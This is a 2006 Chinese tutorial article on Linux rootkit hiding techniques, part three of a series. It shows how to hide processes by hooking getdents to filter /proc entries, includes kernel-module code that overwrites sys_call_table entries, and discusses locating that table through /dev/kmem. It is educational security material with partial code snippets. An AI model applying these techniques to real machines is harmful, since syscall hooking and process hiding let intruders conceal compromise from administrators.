硬件学院 | 网络学院 | 游戏秘籍 | 求职技巧 | 企业管理 | 软件资讯 | IT导购 | 软件下载 | 源码下载 软件学院 | 安全资讯 | 图形图象 | 网络营销 | 电子商务 | 硬件资讯 | IT生活 | 教程下载 | 电影娱乐
	网站首页 个人求职 单位招聘 高校联盟 猎头服务 培训服务 资讯中心 IT论坛

让每一个热爱IT的人都找到一份满意的工作！		文章搜索： 按标题查找

您的位置：首页->-> 安全资讯-> 技术课堂-> Linux环境下的高级隐藏技术(安全)（三）
Linux环境下的高级隐藏技术(安全)（三） 作者：佚名 来源：豆豆技术 加入时间：2006-3-21　www.cnitrc.com 2.3 隐藏进程 　　 在Linux中不存在直接查询进程信息的系统调用，类似于ps这样查询进程信息的命令是通过查询proc文件系统来实现的，在背景知识中已经介绍过proc文件系统，由于它应用文件系统的接口实现，因此同样可以用隐藏文件的方法来隐藏proc文件系统中的文件，只需要在上面的hacked_getdents中加入对于proc文件系统的判断即可。由于proc是特殊的文件系统，只存在于内存之中，不存在于任何实际设备之上，所以Linux内核分配给它一个特定的主设备号0以及一个特定的次设备号1，除此之外，由于在外存上没有与之对应的i节点,所以系统也分配给它一个特殊的节点号PROC_ROOT_INO（值为1），而设备上的1号索引节点是保留不用的。通过上面的分析，可以得出判断一个文件是否属于proc文件系统的方法： 　　 1）得到该文件对应的inode结构dinode; 　　 2）if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i _dev) == 1) {该文件属于proc文件系统} 　　 通过上面的分析，给出隐藏特定进程的伪代码表示： 　　 hacket_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) 　　 { 　　 调用原来的系统调用； 　　 得到fd所对应的节点； 　　 if(该文件属于proc文件系统&&该文件名需要隐藏) 　　　　 {从dirp中去掉该文件相关信息} } 　 2.4　修改系统调用的方法 　　 现在已经解决了如何修改系统调用来达到隐藏的目的，那么如何用修改后的系统调用来替换原来的呢？这个问题在实际应用中往往是最关键的，下面将讨论在不同的情况下如何做到这一点。 　　 (1)当系统导出sys_call_table，并且支持动态的插入模块的情况下： 　　 在Linux内核2.4.18版以前，这种内核配置是非常普遍的。这种情况下修改系统调用非常容易，只需要修改相应的sys_call_table表项，使其指向新的系统调用即可。下面是相应的代码： 　　 int orig_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) 　　 int init_module(void)　 　　 /*初始化模块*/ 　　 { 　　 orig_getdents=sys_call_table[SYS_getdents];　　　　//保存原来的系统调用 　　 orig_query_module=sys_call_table[SYS_query_module] 　　 sys_call_table[SYS_getdents]=hacked_getdents;　　//设置新的系统调用 　　 sys_call_table[SYS_query_module]=hacked_query_module; 　　 return 0; //返回0表示成功 　　 } 　　 void cleanup_module(void) 　　 /*卸载模块*/ 　　 { 　　 sys_call_table[SYS_getdents]=orig_getdents;　　　　//恢复原来的系统调用 　　 sys_call_table[SYS_query_module]=orig_query_module; 　　 } 　　 (2)在系统并不导出sys_call_table的情况下： 　　 linux内核在2.4.18以后为了安全起见不再导出sys_call_table符号，从而无法直接获得系统调用表的地址，那么就必须找到其他的办法来得到这个地址。在背景知识中提到了/dev/kmem是系统主存的映像，可以通过查询该文件来找到sys_call_table的地址，并对其进行修改，来使用新的系统调用。那么如何在系统映像中找到sys_call_table的地址呢？让我们先看看system_call的源代码是如何来实现系统调用的（代码见/arch/i386/kernel/entry.S）： ENTRY(system_call) 　　 pushl %eax　　　　　　# save orig_eax 　　 SAVE_ALL 　　 GET_CURRENT(%ebx) 　　 cmpl $(NR_syscalls),%eax 　　 jae badsys 　　 testb $0x02,tsk_ptrace(%ebx)　　# PT_TRACESYS 　　 jne tracesys 　　 call *SYMBOL_NAME(sys_call_table)(,%eax,4) 　　 movl %eax,EAX(%esp)　　　　# save the return value ENTRY(ret_from_sys_call) 相关文章： 病毒专杀进程列表 "网络钓鱼"的原理与防范（）二 "网络钓鱼"的原理与防范（一） 什么是防火墙？ 关于安全政策的六个偏见（二） 关于安全政策的六个偏见（一） 什么是ARP?如何防范ARP欺骗?（四） 什么是ARP?如何防范ARP欺骗?（三） 什么是ARP?如何防范ARP欺骗? （二） 什么是ARP?如何防范ARP欺骗?（一）	技术课堂 技术课堂 通讯相关 网络信息相关 病毒相关 其他类 本类阅读TOP10 ·什么是ARP?如何防范ARP欺骗?（一） ·什么是ARP?如何防范ARP欺骗?（四） ·什么是ARP?如何防范ARP欺骗? （二） ·什么是ARP?如何防范ARP欺骗?（三） ·病毒专杀进程列表 ·黑客与网管的30天的较量（二） ·IPC攻击详解（二） ·黑客与网管的30天的较量（四） ·什么是防火墙？ ·"网络钓鱼"的原理与防范（）二

关于我们 | 服务声明 | 使用帮助 | 广告合作 | 网站地图 | 友情链接 | 加盟合作 | 联系我们

Copyright ? 2006 cnitrc.com Inc. All Rights Reserved. 浙ICP备05074295号 中国IT人才网 版权所有 网络实名：中国IT人才 未经书面授权严禁转载和复制本站的任何招聘信息和文章